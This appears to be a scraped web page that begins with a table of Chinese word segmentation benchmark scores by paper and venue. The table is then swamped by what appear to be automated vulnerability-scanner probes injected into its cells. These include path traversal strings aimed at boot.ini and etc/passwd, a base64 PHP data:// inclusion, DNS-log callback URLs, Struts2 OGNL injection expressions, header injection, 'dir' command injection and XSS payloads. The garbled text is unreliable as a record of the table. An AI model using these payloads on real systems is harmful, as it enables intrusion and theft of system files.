Tseng et al. (2005)
|
95.0 |
96.4 |
95.2 |
94.7 |
- |
- |
- |
- |
2005 |
SIGHAN |
Zhang and Clark (2007)
|
94.5 |
97.2 |
94.6 |
96.5 |
- |
- |
- |
- |
2007 |
ACL |
Zhao and Kit (2008)
|
95.4 |
97.6 |
96.1 |
95.7 |
- |
- |
- |
- |
2008 |
SIGHAN |
Sun et al. (2009)
|
95.2 |
97.3 |
94.6 |
- |
- |
- |
- |
- |
2009 |
NAACL |
Zhao et al. (2010)
|
- |
- |
- |
- |
- |
98.3 |
97.8 |
96.1 |
2010 |
TALIP |
Sun et al. (2012)
|
95.4 |
97.4 |
94.8 |
- |
- |
- |
- |
- |
2012 |
ACL |
Zhang et al. (2013)
|
- |
- |
- |
- |
96.1 |
97.4 |
- |
- |
2013 |
EMNLP |
Pei et al. (2014)
|
93.5 |
94.0 |
- |
- |
94.4 |
94.9 |
- |
- |
2014 |
ACL |
Chen et al. (2015)
|
94.4 |
95.1 |
- |
- |
96.4 |
97.6 |
- |
- |
2015 |
ACL |
Chen et al. (2015)
|
94.3 |
95.0 |
- |
- |
96.5 |
97.4 |
- |
- |
2015 |
EMNLP |
Ma and Hinrichs (2015)
|
95.1 |
96.6 |
- |
- |
- |
- |
- |
- |
2015 |
ACL |
Cai and Zhao (2016)
|
95.2 |
96.4 |
- |
- |
95.5 |
96.5 |
- |
- |
2016 |
ACL |
Xu and Sun (2016)
|
- |
- |
- |
- |
96.1 |
96.3 |
- |
- |
2016 |
ACL |
Zhang et al. (2016)
|
95.1 |
97.0 |
- |
- |
95.7 |
97.7 |
- |
- |
2016 |
ACL |
Liu et al. (2016)
|
93.9 |
95.2 |
- |
- |
95.7 |
97.6 |
- |
- |
2016 |
IJCAI |
Yang et al. (2017)
|
- |
- |
- |
- |
96.2 |
97.3 |
96.7 |
95.4 |
2017 |
ACL |
Cai et al. (2017)
|
95.4 |
97.0 |
95.4 |
95.2 |
95.8 |
97.1 |
95.6 |
95.3 |
2017 |
ACL |
Zhou et al. (2017)
|
- |
- |
- |
- |
96.0 |
97.8 |
- |
- |
2017 |
EMNLP |
Zhang et al. (2018)
|
- |
- |
- |
- |
96.5 |
97.8 |
96.3 |
95.9 |
2018 |
AAAI |
(Chen et al., 2017)
|
- |
- |
- |
- |
94.3 |
96.0 |
95.6 |
94.6 |
2017 |
ACL |
(Wang et al., 2019)
|
- |
- |
- |
- |
96.1 |
97.5 |
95.9 |
95.6 |
2019 |
AAAI |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8/ |
http://checkdnslog.jiance.qianxin.com/ddffdd.php
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
http://checkdnslog.jiance.qianxin.com/ddffdd.php |
http://checkdnslog.jiance.qianxin.com/ddffdd
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
http://checkdnslog.jiance.qianxin.com/ddffdd |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
data://text/plain;base64,PD9waHAgZWNobyBtZDUoIndlYnNjYW4iKTs/Pg== |
../..//../..//../..//../..//../..//../..//../..//../..//boot.ini
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
../..//../..//../..//../..//../..//../..//../..//../..//boot.ini |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
../../../../../../../../boot.ini |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
/.\\./.\\./.\\./.\\./.\\./.\\./boot.ini |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
C:\boot.ini |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
../../../../../../../../boot.ini.htm |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
................windowswin.ini |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
..\..\..\..\..\..\..\..\etc/passwd |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
..\..\..\..\..\..\..\..\etc/passwd |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
SomeCustomInjectedHeader:injected_by_test |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
SomeCustomInjectedHeader:injected_by_test |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
SomeCustomInjectedHeader:injected_by_test |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
SomeCustomInjectedHeader:injected_by_test |
SomeCustomInjectedHeader:injected_by_test
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
SomeCustomInjectedHeader:injected_by_test |
SomeCustomInjectedHeader:injected_by_test
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
SomeCustomInjectedHeader:injected_by_test |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
|
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
http://oxoxoxoxoxoxox.com |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
oxoxoxoxoxoxox.com |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
oxoxoxoxoxoxox.com |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
http://oxoxoxoxoxoxox.com |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8'" |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8/ |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8) |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8) |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
phpinfo |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
../..//../..//../..//../..//../..//../..//../..//../..//boot.ini |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././boot.ini |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
|..\..\..\..\..\..\..\..\boot.ini |
..\..\..\..\..\..\..\..\boot.ini
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
..\..\..\..\..\..\..\..\boot.ini |
../..//../..//../..//../..//../..//../..//../..//../..//boot.ini
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
../..//../..//../..//../..//../..//../..//../..//../..//boot.ini |
<..\..\..\..\..\..\..\..\boot.ini
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
<..\..\..\..\..\..\..\..\boot.ini |
................windowswin.ini
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
................windowswin.ini |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
..\..\..\..\..\..\..\..\etc/passwd |
http://some-inexistent-website.com/some_inexistent_file_with_long_name
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
http://some-inexistent-website.com/some_inexistent_file_with_long_name |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
${87654321-12345678} |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
${87654321-12345678} |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
dir |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
dir |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
|
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
dir |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
|
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
dir |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
|
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
';?> |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
|
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
http://checkdnslog.jiance.qianxin.com/ |
http://checkdnslog.jiance.qianxin.com/
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
http://checkdnslog.jiance.qianxin.com/ |
8'"
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8'" |
8/
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8/ |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
http://checkdnslog.jiance.qianxin.com/ddffdd.php |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8) |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8) |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8) |
../../../../../../../../boot.ini
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
../../../../../../../../boot.ini |
../../../../../../../../boot.ini.txt
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
../../../../../../../../boot.ini.txt |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
file:///c:/boot.ini |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
../../../../../../../../boot.ini.html |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
C:\boot.ini |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
../..//../..//../..//../..//../..//../..//../..//../..//boot.ini |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././boot.ini |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
<..\..\..\..\..\..\..\..\boot.ini |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
../../../../../../../../boot.ini.htm |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
../../../../../../../../boot.ini.txt |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
../../../../../../../../boot.ini |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
..\..\..\..\..\..\..\..\boot.ini |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././boot.ini |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
................etc/passwd |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
..\..\..\..\..\..\..\..\etc/passwd |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
..\..\..\..\..\..\..\..\boot.ini |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
|..\..\..\..\..\..\..\..\boot.ini |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
../../../../../../../../boot.ini.jpg |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
SomeCustomInjectedHeader:injected_by_test |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cetc/passwd |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
................etc/passwd |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
oxoxoxoxoxoxox.com |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
SomeCustomInjectedHeader:injected_by_test |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
SomeCustomInjectedHeader:injected_by_test |
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
|
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
phpinfo |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
${87654321-12345678} |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
http://checkdnslog.jiance.qianxin.com/ddffdd.php |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
http://checkdnslog.jiance.qianxin.com/ddffdd |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
http://checkdnslog.jiance.qianxin.com/ddffdd.php |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
data://text/plain;base64,PD9waHAgZWNobyBtZDUoIndlYnNjYW4iKTs/Pg== |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
http://checkdnslog.jiance.qianxin.com/ddffdd.php |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
http://checkdnslog.jiance.qianxin.com/ddffdd |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
http://checkdnslog.jiance.qianxin.com/ddffdd.php |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
http://checkdnslog.jiance.qianxin.com/ddffdd |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
data://text/plain;base64,PD9waHAgZWNobyBtZDUoIndlYnNjYW4iKTs/Pg== |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
http://checkdnslog.jiance.qianxin.com/ddffdd.php |
qqqxss
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
st4r7s<3nd
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
st4r7s>3nd
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
confirm()>qqqxss3nd
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
st4r7s
|
= |
(prompt)``
x>qqqxss3nd |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
st4r7s3nd
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
ONPoINtEReNTeR
|
= |
[8].find(confirm)>qqqxss3nd |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
oNPointErEnteR
=
[8].find(confirm)>qqqxss3nd
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
st4r7sqqqxss3nd
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
st4r7s3nd
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
(prompt)``>3nd
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
a=prompt,a()>qqqxss3nd
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
onPoINTEReNtEr = [8].find(confirm)
x//3nd
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
st4r7s3nd
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
confirm()>3nd
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
st4r7s
|
= |
confirm()
x//3nd |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8) |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8!(() |
8!(()
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8!(() |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8!(() |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8) |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
http://checkdnslog.jiance.qianxin.com/ddffdd.php |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
http://checkdnslog.jiance.qianxin.com/ddffdd |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
http://checkdnslog.jiance.qianxin.com/ddffdd.php |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
http://checkdnslog.jiance.qianxin.com/ddffdd.php |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
http://checkdnslog.jiance.qianxin.com/ddffdd |
${#context['com.opensy' 'mphony.xwork2.disp' 'atcher.HttpServlet' 'Response'].addHeader('s2045we' 'bscan' 'test','vul')}
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
${#context['com.opensy' 'mphony.xwork2.disp' 'atcher.HttpServlet' 'Response'].addHeader('s2045we' 'bscan' 'test','vul')} |
/.\\./.\\./.\\./.\\./.\\./.\\./boot.ini
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
/.\\./.\\./.\\./.\\./.\\./.\\./boot.ini |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
../../../../../../../../boot.ini.html |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
/.\\./.\\./.\\./.\\./.\\./.\\./boot.ini |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
C:\boot.ini |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
<..\..\..\..\..\..\..\..\boot.ini |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
................windowswin.ini |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
..\..\..\..\..\..\..\..\etc/passwd |
................etc/passwd
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
................etc/passwd |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
http://some-inexistent-website.com/some_inexistent_file_with_long_name |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
SomeCustomInjectedHeader:injected_by_test |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
SomeCustomInjectedHeader:injected_by_test |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
SomeCustomInjectedHeader:injected_by_test |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
SomeCustomInjectedHeader:injected_by_test |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
SomeCustomInjectedHeader:injected_by_test |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
dir |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
dir |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
|
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
dir |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
|
dir
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
dir |
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
|
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
dir |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
|
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
dir |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
|
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
http://oxoxoxoxoxoxox.com |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
oxoxoxoxoxoxox.com |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
http://oxoxoxoxoxoxox.com |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
oxoxoxoxoxoxox.com |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
http://oxoxoxoxoxoxox.com |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
http://oxoxoxoxoxoxox.com |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
oxoxoxoxoxoxox.com |
http://oxoxoxoxoxoxox.com
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
http://oxoxoxoxoxoxox.com |
oxoxoxoxoxoxox.com
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
oxoxoxoxoxoxox.com |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
oxoxoxoxoxoxox.com |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
http://oxoxoxoxoxoxox.com |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
http://oxoxoxoxoxoxox.com |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
oxoxoxoxoxoxox.com |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
';?> |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
|
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
http://checkdnslog.jiance.qianxin.com/ |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
http://checkdnslog.jiance.qianxin.com/ |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
http://checkdnslog.jiance.qianxin.com/ |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
http://checkdnslog.jiance.qianxin.com/ |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
http://checkdnslog.jiance.qianxin.com/ |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
${87654321-12345678} |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
${87654321-12345678} |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
${87654321-12345678} |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
${87654321-12345678} |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
${87654321-12345678} |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
${87654321-12345678} |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8!(()
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8!(() |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
${#context['com.opensy' 'mphony.xwork2.disp' 'atcher.HttpServlet' 'Response'].addHeader('s2045we' 'bscan' 'test','vul')} |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
${(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess=#dm).(#cmd='###Vul').(#cmd=#cmd 'nerable###').(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(#ros.write(#cmd.getBytes())).(#ros.flush())} |
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././boot.ini
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././boot.ini |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././boot.ini |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
..蜡..蜡..蜡..蜡..蜡..蜡..蜡..蜡boot.ini |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
<..\..\..\..\..\..\..\..\boot.ini |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
|..\..\..\..\..\..\..\..\boot.ini |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
../../../../../../../../boot.ini.htm |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
../../../../../../../../boot.ini.txt |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
file:///c:/boot.ini |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
................windowswin.ini |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
..\..\..\..\..\..\..\..\etc/passwd |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
http://some-inexistent-website.com/some_inexistent_file_with_long_name |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
/some_inexistent_file_with_long_name |
http://some-inexistent-website.com/some_inexistent_file_with_long_name
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
http://some-inexistent-website.com/some_inexistent_file_with_long_name |
/some_inexistent_file_with_long_name
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
/some_inexistent_file_with_long_name |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
http://some-inexistent-website.com/some_inexistent_file_with_long_name |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
/some_inexistent_file_with_long_name |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
http://some-inexistent-website.com/some_inexistent_file_with_long_name |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
/some_inexistent_file_with_long_name |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
http://some-inexistent-website.com/some_inexistent_file_with_long_name |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
/some_inexistent_file_with_long_name |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
SomeCustomInjectedHeader:injected_by_test |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
SomeCustomInjectedHeader:injected_by_test |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
SomeCustomInjectedHeader:injected_by_test |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
SomeCustomInjectedHeader:injected_by_test |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
SomeCustomInjectedHeader:injected_by_test |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
SomeCustomInjectedHeader:injected_by_test |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
SomeCustomInjectedHeader:injected_by_test |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
SomeCustomInjectedHeader:injected_by_test |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
SomeCustomInjectedHeader:injected_by_test |
SomeCustomInjectedHeader:injected_by_test
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
SomeCustomInjectedHeader:injected_by_test |
SomeCustomInjectedHeader:injected_by_test
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
SomeCustomInjectedHeader:injected_by_test |
SomeCustomInjectedHeader:injected_by_test
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
SomeCustomInjectedHeader:injected_by_test |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
SomeCustomInjectedHeader:injected_by_test |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
SomeCustomInjectedHeader:injected_by_test |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
SomeCustomInjectedHeader:injected_by_test |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
SomeCustomInjectedHeader:injected_by_test |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
SomeCustomInjectedHeader:injected_by_test |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
SomeCustomInjectedHeader:injected_by_test |
SomeCustomInjectedHeader:injected_by_test
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
SomeCustomInjectedHeader:injected_by_test |
SomeCustomInjectedHeader:injected_by_test
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
SomeCustomInjectedHeader:injected_by_test |
SomeCustomInjectedHeader:injected_by_test
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
SomeCustomInjectedHeader:injected_by_test |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
SomeCustomInjectedHeader:injected_by_test |
8
|
8 |
8 |
8 |
8 |
8 |
